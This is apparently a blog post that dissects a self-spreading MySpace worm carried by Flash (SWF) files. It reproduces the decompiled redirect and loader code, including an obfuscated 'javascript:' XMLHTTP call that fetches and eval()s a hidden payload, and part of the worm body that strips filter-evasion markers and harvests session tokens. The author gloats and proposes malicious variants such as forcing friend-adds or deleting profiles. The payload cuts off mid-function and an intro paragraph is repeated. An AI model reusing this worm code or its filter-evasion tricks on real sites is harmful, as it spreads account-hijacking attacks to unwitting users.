Myspace SWF redirect exploit worm
SWEET! Everyone on Myspace is a tool. ALways were and will be moreso in the future. I am NOT apologizing for that. NO. Mysapce was actually started by spammers as a way to easily data mine. Anyway, that is not what i am going to talk about. Myspace just got hit by a nifty little .SWF flash redirect exploit worm. **Note. I didn't make it. "darn"**
Props to Kinematic for Digging this (digg.com)
For those of you not "in" to reading code, I will explain what this basically means. When you are signed in to myspace and go to an infected profile, It infects your profile and sends you to a site with conspiracy theories about how bush knew about 9/11. (not that they aren't true)
Fixing this is going to be almost impossible except block all flash content. It will be interesting to see how they deal with this. This is only the first of many, many, Myspace explots. Just because of how it operates using URL's it is so easy to do things to people. You could edit this code so that everyone who saw your profile would add you as a friend, or compltley delete their profile... the possibilites are endless! (for other people, that is. heh, heh)
How the myspace SWF hack worked
First note: I DID NOT MAKE THE HACK. I simply downloaded the .swf's, decompiled them, looked at the actionscript, worked out what it did, found the Javascript that it uses, and tidied it up & commented it. I've probably got some bits wrong, feel free to contact me and I'll update this page
When you visited an already infected page, there was an SWF embedded ("redirect.swf") which contained the actionscript:
getURL("http://editprofile.myspace.com/index.cfm?fuseaction=blog.view&friend
ID=93634373
&blogID=144877075", "_self");
Which is pretty self explanatory - it opened the blog URL which you got redirected to.
On the blog url which you got redirected to, there was another SWF embedded, called "retrievecookie.swf". This contained:
getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace
.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.
onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1)){var n=sc.indexOf(\'
\');if(n==-1)n=sc.indexOf(\'-XXX\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length)
;};" + "eval(sc);}};" + "x.send(null);", "");
Which looks pretty obfuscated, however, when you space it out and add comments:
getURL("
javas\n\r
cript:
//this translates in the browser to: "javascript:"
//which myspace really should have blocked now.
var x = new ActiveXObject(\'Msxml2.XMLHTTP\');
// loads a new xmlHTTP object, sets it as var "x"
x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeC
omments&friendID=93634373\',true);
// This opens yet another blog post, at the URL above. The text of the URL is below
x.onreadystatechange = function()
// when the readystate of the xmlHTTP object changes:
{
if (x.readyState==4)
// once the state changes to complete (it goes from 0 to 4, iirc)
{
var pg = x.responseText;
// the code it got from the page
var sc = pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));
// loads into "sc" the contents of the response text from the place where
// the end of "BX-" (that's the +3) is first encountered up until it finds the start of
// "-EX", this is all the nasty JS.
while ( (sc.indexOf(\'
\')!=-1) || (sc.indexOf(\'-XXX\')!=-1) )
// while "sc" (the code) doesn't contain "
" or "-XXX" then:
{
var n=sc.indexOf(\'
\');
// n is the start of where it finds "
" in "sc"
if (n==-1)
n=sc.indexOf(\'-XXX\');
// if it cant find "
, then make n where it can find "-XXX"
// thist bit next was really quite clever, it manages to keep the > closing bracket for
// the embed tag, which it needs, and creates the embed tag by removing
// XXX's and leaving the final character!
sc = sc.substring(0,n)+sc.substring(n+5,sc.length);
// sc is now from the start, to n.
// then add on to sc the bit from n+5 to the end of sc,
// essentially, this cuts out the crap from the blog post it pull.
// the crap was in there in the first place to get past myspace's filters, I presume.
};
// this iterates through and removes the -XXX's from the blog post
" + "eval(sc);
// evaluate "sc" - this is what does it all.
} // end of readystate==4 "if"
}; //end of function
" //closing the quote from the SWF getURL() function
+
"
x.send(null);
// adds on sending "null" to the xmlHTTP object.
", ""
// no target, so it just executes.
);// end of SWF getURL function.
In essence, it pulls a blog post from somewhere else on myspace, and evaluates the code that it contains.
This is the post:
BX-var msg='-XXXX<-XXX XE-XXXXM-XXXXB-XXXXE-XXXXD-XXXX src="http://i105.photobucket.com/albums/m225/yrkblack/redirect.swf">BY SPAIRLKAIFS';function paramsToString(AV){ var N=new String(); var O=0; for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){ Q=Q.replace('+', '%2B')}while(Q.indexOf('&')!=-1){ Q=Q.replace('&amp;amp;amp;amp;', '%26')}N+=P+'='+Q;O++ } return N};function getToken(page){ var start = page.indexOf('Mytoken='); token = page.substring(start+8, start+8+36); return token;};function getHashCode(page){ var start = page.indexOf
Props to Kinematic for Digging this (digg.com)
For those of you not "in" to reading code, I will explain what this basically means. When you are signed in to myspace and go to an infected profile, It infects your profile and sends you to a site with conspiracy theories about how bush knew about 9/11. (not that they aren't true)
Fixing this is going to be almost impossible except block all flash content. It will be interesting to see how they deal with this. This is only the first of many, many, Myspace explots. Just because of how it operates using URL's it is so easy to do things to people. You could edit this code so that everyone who saw your profile would add you as a friend, or compltley delete their profile... the possibilites are endless! (for other people, that is. heh, heh)